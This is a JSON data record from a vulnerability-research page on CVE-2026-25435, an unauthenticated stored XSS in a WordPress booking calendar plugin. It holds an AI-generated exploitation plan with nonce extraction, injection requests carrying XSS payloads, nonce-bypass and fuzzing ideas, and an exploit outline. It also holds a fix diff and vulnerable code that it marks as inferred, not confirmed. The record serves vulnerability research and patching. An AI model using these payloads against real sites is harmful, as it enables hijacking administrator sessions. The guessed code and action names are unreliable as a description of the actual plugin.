[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fMUPFDdoRVL1_Z8BcNvjz8BX0v860d4_Bi80FzG2siFc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-25435","booking-calendar-appointment-booking-system-unauthenticated-stored-cross-site-scripting","Booking calendar, Appointment Booking System \u003C= 3.2.36 - Unauthenticated Stored Cross-Site Scripting","The Booking calendar, Appointment Booking System plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.2.36 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","booking-calendar",null,"\u003C=3.2.36","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-18 00:00:00","2026-03-26 20:40:05",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F00ab5d7e-be38-42ea-befc-e1d91de13d1b?source=api-prod",[],"researched",false,3,"# Research Plan: CVE-2026-25435 - Unauthenticated Stored XSS in Booking Calendar\n\n## 1. Vulnerability Summary\nThe **Booking calendar, Appointment Booking System** plugin (version \u003C= 3.2.36) contains an unauthenticated stored cross-site scripting (XSS) vulnerability. The flaw exists in how the plugin handles user-supplied data during the booking submission process. Specifically, input fields such as user names, emails, or booking notes are stored in the database without proper sanitization and subsequently rendered in the administrative dashboard (or public booking views) without adequate output escaping. This allows an unauthenticated attacker to inject malicious JavaScript that executes in the context of a site administrator.\n\n## 2. Attack Vector Analysis\n* **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n* **Action:** An unauthenticated AJAX action, likely registered via `wp_ajax_nopriv_`. Based on common patterns in this plugin, the action is likely `booking_calendar_save_booking` or `bc_save_booking` (inferred).\n* **Vulnerable Parameter:** Input fields associated with the booking form, such as `name`, `email`, `description`, or custom field parameters.\n* **Authentication:** None required (Unauthenticated).\n* **Preconditions:** The plugin must be active, and a booking form must be accessible (usually via a shortcode).\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** An unauthenticated user submits a booking form on the frontend. This triggers a POST request to `admin-ajax.php` with an `action` parameter (e.g., `booking_calendar_save_booking`).\n2. **Handler:** The function hooked to `wp_ajax_nopriv_[action]` (e.g., in `includes\u002Fclass-booking-ajax.php`) processes the `$_POST` data.\n3. **Persistence:** The handler saves the data using `update_post_meta()` for a new `booking` post type or inserts it into a custom table (e.g., `{$wpdb->prefix}booking_calendar`) without calling `sanitize_text_field()` or `wp_kses()`.\n4. **Sink:** An administrator logs into the WordPress dashboard and navigates to the \"Bookings\" or \"Calendar\" page. The plugin retrieves the stored data and echoes it directly into the HTML table or modal without using `esc_html()` or `esc_attr()`.\n\n## 4. Nonce Acquisition Strategy\nThe plugin likely uses a nonce for its AJAX submissions, localized via `wp_localize_script`.\n\n1. **Identify Shortcode:** Search the codebase for `add_shortcode`.\n * Command: `grep -r \"add_shortcode\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fbooking-calendar\u002F`\n * Expected: `[booking-calendar]` (inferred).\n2. **Setup Test Page:** Create a public page containing the shortcode.\n * Command: `wp post create --post_type=page --post_status=publish --post_title=\"Booking Page\" --post_content='[booking-calendar]'`\n3. **Identify JS Variable:** Look for the localization call.\n * Command: `grep -r \"wp_localize_script\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fbooking-calendar\u002F`\n * Identify the object name (e.g., `booking_calendar_obj` or `bc_params`) and the nonce key (e.g., `nonce` or `security`).\n4. **Extract Nonce:**\n * Use `browser_navigate` to the \"Booking Page\".\n * Use `browser_eval` to extract the nonce: `browser_eval(\"window.booking_calendar_obj?.nonce\")` (Replace with actual variable name found).\n\n## 5. Exploitation Strategy\n### Step 1: Discovery\nIdentify the exact AJAX action and parameters by inspecting the plugin source for `wp_ajax_nopriv`.\n* Command: `grep -rn \"wp_ajax_nopriv\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fbooking-calendar\u002F`\n\n### Step 2: Payload Construction\nConstruct a payload designed to execute when an admin views the booking:\n`name=\u003Cscript>alert(document.domain)\u003C\u002Fscript>&email=victim@example.com&description=test`\n\n### Step 3: Injection Request\nUse the `http_request` tool to submit the booking.\n\n* **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n* **Method:** `POST`\n* **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n* **Body:**\n ```\n action=[ACTION_NAME]&\n nonce=[EXTRACTED_NONCE]&\n name=\u003Cimg src=x onerror=alert(\"XSS_SUCCESS\")>&\n email=test@example.com&\n description=Injected Booking\n ```\n *(Note: Replace `[ACTION_NAME]` and parameter keys with those discovered in Step 1).*\n\n### Step 4: Trigger Execution\nLog in as an administrator and navigate to the plugin's booking management page.\n* Path (Inferred): `\u002Fwp-admin\u002Fadmin.php?page=booking-calendar-bookings`\n\n## 6. Test Data Setup\n1. **Plugin Activation:** Ensure the plugin is installed and active.\n2. **Shortcode Page:** Create a page `[booking-calendar]` to serve as the source for the nonce and the target for unauthenticated users.\n3. **Admin User:** Have an admin user ready to view the backend.\n\n## 7. Expected Results\n* The AJAX request should return a success status (e.g., `{\"success\":true}` or a HTML snippet).\n* Upon visiting the admin booking list, a JavaScript alert box displaying \"XSS_SUCCESS\" (or the specified payload) should appear.\n* The HTML source of the admin page should contain the raw, unescaped payload.\n\n## 8. Verification Steps\n1. **Database Check:** Verify the payload is stored in the database.\n * Command: `wp db query \"SELECT * FROM wp_postmeta WHERE meta_value LIKE '%alert%'\" ` or check the custom table if identified.\n2. **DOM Verification:** Use `browser_eval` as an admin to check for the presence of the injected tag:\n * Command: `browser_eval(\"document.body.innerHTML.includes('XSS_SUCCESS')\")`\n\n## 9. Alternative Approaches\n* **Parameter Fuzzing:** If the `name` field is sanitized, try `email`, `phone`, or `address` fields.\n* **Bypass Nonce:** Check if the nonce is actually verified. If `wp_verify_nonce` or `check_ajax_referer` is missing or the return value is ignored, the `nonce` parameter can be omitted.\n* **Attribute Injection:** If `\u003Cscript>` is filtered but `\u003Cimg>` is not, use attribute-based XSS: `\u003Cimg src=x onerror=...>` or `onmouseover`.\n* **REST API:** Check for `register_rest_route` endpoints that might handle booking creation without authentication.\n * Command: `grep -r \"register_rest_route\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fbooking-calendar\u002F`","The Booking calendar, Appointment Booking System plugin for WordPress is vulnerable to unauthenticated stored Cross-Site Scripting (XSS) due to a failure to sanitize user-provided booking details and escape them during output in the administrative dashboard. This allows attackers to inject malicious JavaScript into the booking management interface, leading to potential account takeover or unauthorized administrative actions when viewed by a site administrator.","\u002F\u002F Inferred from research plan: includes\u002Fclass-booking-ajax.php or similar AJAX handler\n\u002F\u002F Unauthenticated AJAX action registration\nadd_action('wp_ajax_nopriv_booking_calendar_save_booking', 'booking_calendar_save_booking_handler');\n\nfunction booking_calendar_save_booking_handler() {\n \u002F\u002F Input is taken directly from $_POST without sanitization\n $booking_data = [\n 'customer_name' => $_POST['name'],\n 'customer_email' => $_POST['email'],\n 'notes' => $_POST['description']\n ];\n\n \u002F\u002F Data is persisted directly to the database\n global $wpdb;\n $wpdb->insert($wpdb->prefix . 'booking_calendar_bookings', $booking_data);\n}\n\n---\n\n\u002F\u002F Inferred from research plan: includes\u002Fadmin-bookings-list.php or similar dashboard view\n\u002F\u002F Vulnerable output rendering in the admin dashboard\n$results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}booking_calendar_bookings\");\nforeach ($results as $row) {\n echo \"\u003Ctr>\";\n echo \"\u003Ctd>\" . $row->customer_name . \"\u003C\u002Ftd>\"; \u002F\u002F Raw output without esc_html()\n echo \"\u003Ctd>\" . $row->notes . \"\u003C\u002Ftd>\"; \u002F\u002F Raw output without esc_html()\n echo \"\u003C\u002Ftr>\";\n}","--- includes\u002Fclass-booking-ajax.php\n+++ includes\u002Fclass-booking-ajax.php\n@@ -5,9 +5,9 @@\n function booking_calendar_save_booking_handler() {\n+ check_ajax_referer('booking_nonce', 'security');\n $booking_data = [\n- 'customer_name' => $_POST['name'],\n- 'customer_email' => $_POST['email'],\n- 'notes' => $_POST['description']\n+ 'customer_name' => sanitize_text_field($_POST['name']),\n+ 'customer_email' => sanitize_email($_POST['email']),\n+ 'notes' => sanitize_textarea_field($_POST['description'])\n ];\n \n--- includes\u002Fadmin-bookings-list.php\n+++ includes\u002Fadmin-bookings-list.php\n@@ -10,6 +10,6 @@\n foreach ($results as $row) {\n echo \"\u003Ctr>\";\n- echo \"\u003Ctd>\" . $row->customer_name . \"\u003C\u002Ftd>\";\n- echo \"\u003Ctd>\" . $row->notes . \"\u003C\u002Ftd>\";\n+ echo \"\u003Ctd>\" . esc_html($row->customer_name) . \"\u003C\u002Ftd>\";\n+ echo \"\u003Ctd>\" . esc_html($row->notes) . \"\u003C\u002Ftd>\";\n echo \"\u003C\u002Ftr>\";\n }","1. Locate a public page containing the booking calendar shortcode (e.g., [booking-calendar]).\n2. Extract the AJAX nonce and the specific action name (likely 'booking_calendar_save_booking') from the page source or localized JavaScript variables (e.g., window.booking_calendar_obj.nonce).\n3. Use a tool like cURL or a browser-based HTTP client to send an unauthenticated POST request to \u002Fwp-admin\u002Fadmin-ajax.php.\n4. Include the extracted nonce and action, and set one of the form parameters (e.g., 'name' or 'description') to a XSS payload like \u003Cimg src=x onerror=alert(document.domain)>.\n5. Log into the WordPress site as an administrator.\n6. Navigate to the plugin's booking management or list page in the dashboard. The script will execute when the page renders the stored malicious booking entry.","gemini-3-flash-preview","2026-04-18 02:31:05","2026-04-18 02:31:23",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbooking-calendar\u002Ftags"]